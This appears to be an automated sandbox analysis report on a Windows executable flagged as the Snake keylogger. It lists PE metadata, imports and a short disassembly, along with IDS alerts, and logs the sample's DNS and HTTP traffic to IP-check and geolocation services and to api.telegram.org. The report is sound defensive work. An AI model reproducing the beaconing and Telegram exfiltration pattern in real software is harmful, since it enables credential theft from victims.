Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x674FAD93 [Wed Dec 4 01:17:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction:
    call 00007F8C74BB58CAh
    jmp 00007F8C74BA8694h
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    int3
    push edi
    push esi
    mov esi, dword ptr [esp+10h]
    mov ecx, dword ptr [esp+14h]
    mov edi, dword ptr [esp+0Ch]
    mov eax, ecx
    mov edx, ecx
    add eax, esi
    cmp edi, esi
    jbe 00007F8C74BA881Ah
    cmp edi, eax
    jc 00007F8C74BA8B7Eh
    bt dword ptr [004C31FCh], 01h
    jnc 00007F8C74BA8819h
    rep movsb
    jmp 00007F8C74BA8B2Ch
    cmp ecx, 00000080h
    jc 00007F8C74BA89E4h
    mov eax, edi
    xor eax, esi
    test eax, 0000000Fh
    jne 00007F8C74BA8820h
    bt dword ptr [004BE324h], 01h
    jc 00007F8C74BA8CF0h
    bt dword ptr [004C31FCh], 00000000h
    jnc 00007F8C74BA89BDh
    test edi, 00000003h
    jne 00007F8C74BA89CEh
    test esi, 00000003h
    jne 00007F8C74BA89ADh
    bt edi, 02h
    jnc 00007F8C74BA881Fh
    mov eax, dword ptr [esi]
    sub ecx, 04h
    lea esi, dword ptr [esi+04h]
    mov dword ptr [edi], eax
    lea edi, dword ptr [edi+04h]
    bt edi, 03h
    jnc 00007F8C74BA8823h
    movq xmm1, qword ptr [esi]
    sub ecx, 08h
    lea esi, dword ptr [esi+08h]
    movq qword ptr [edi], xmm1
    lea edi, dword ptr [edi+08h]
    test esi, 00000007h
    je 00007F8C74BA8875h
    bt esi, 03h
    jnc 00007F8C74BA88C8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x489cc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x110000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x489cc | 0x48a00 | 6a9cb392d4f7a484b35a234ac56c19ed | False | 0.9099948902753873 | data | 7.852726943747123 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x110000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x3fc93 | data | | | 1.0003291651835096
RT_GROUP_ICON | 0x10f44c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10f4c4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10f4d8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10f4ec | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10f500 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10f5dc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T02:55:22.058287+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 158.101.44.242 | 80 | TCP
2025-01-11T02:55:28.308297+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 158.101.44.242 | 80 | TCP
2025-01-11T02:55:29.019529+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
2025-01-11T02:55:29.319000+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 02:55:21.231412888 CET | 192.168.2.4 | 1.1.1.1 | 0xc571 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.053776026 CET | 192.168.2.4 | 1.1.1.1 | 0xc5ff | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:28.276932955 CET | 192.168.2.4 | 1.1.1.1 | 0x38aa | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:21.238620043 CET | 1.1.1.1 | 192.168.2.4 | 0xc571 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:22.060830116 CET | 1.1.1.1 | 192.168.2.4 | 0xc5ff | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 02:55:28.283859968 CET | 1.1.1.1 | 192.168.2.4 | 0x38aa | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 158.101.44.242 | 80 | 7300 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 02:55:21.251450062 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Jan 11, 2025 02:55:21.838393927 CET | 321 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 01:55:21 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 18b8594d608565420c5a26c97e7f2389
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Jan 11, 2025 02:55:21.845527887 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Jan 11, 2025 02:55:22.010802984 CET | 321 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:21 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f111f1e6300f9a0cab5c573355ee4c3c
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                        Jan 11, 2025 02:55:28.092679977 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Jan 11, 2025 02:55:28.256834030 CET321INHTTP/1.1 200 OK
                                                                        Date: Sat, 11 Jan 2025 01:55:28 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 8f9463d0211db1a09ab4bb5453eab3da
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 104.21.16.1 | 443 | 7300 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 01:55:22 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-11 01:55:22 UTC | 859 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 01:55:22 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1875311
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHE3W%2BYS%2BECOkWY2yJlBn4jlYzHdpyUSDDwZYi%2FOG91dHidmQ8DOIKBg45FezA2vFcreepTDODmKMWISEiQ8krU%2Bwk0FGDEOyATFbH%2FP0qRQRseGlLvUQmasI8aYZ8z5iDVhjnKN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 900148c2da2c8ce0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1823&rtt_var=692&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1571582&cwnd=215&unsent_bytes=0&cid=a94e271254624fd9&ts=211&x=0"
2025-01-11 01:55:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | 7300 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
